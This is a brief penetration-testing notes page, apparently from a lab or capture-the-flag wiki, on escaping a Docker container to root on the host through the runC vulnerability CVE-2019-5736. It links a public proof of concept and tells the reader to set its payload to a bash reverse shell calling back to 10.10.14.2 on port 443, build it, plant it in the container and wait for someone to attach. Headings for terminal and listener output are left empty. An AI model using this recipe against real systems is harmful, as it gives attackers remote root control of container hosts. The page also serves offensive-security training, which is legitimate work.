5 privesc docker runC exploit
Using https://github.com/Frichetten/CVE-2019-5736-PoC
The vulnerability allows a malicious container to overwrite the host runc binary and thus gain root-level code execution on the host. The level of user interaction is being able to run any command.
Update payload in the
main.go
;var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.2/443 0>&1"
compile it with go build main.go.
Move that binary to the container you'd like to escape from.
Execute the binary, and then the next time someone attaches to it and calls /bin/sh your payload will fire.
Terminal-1
Terminal-2
NC Listener
Reading Material:
Last updated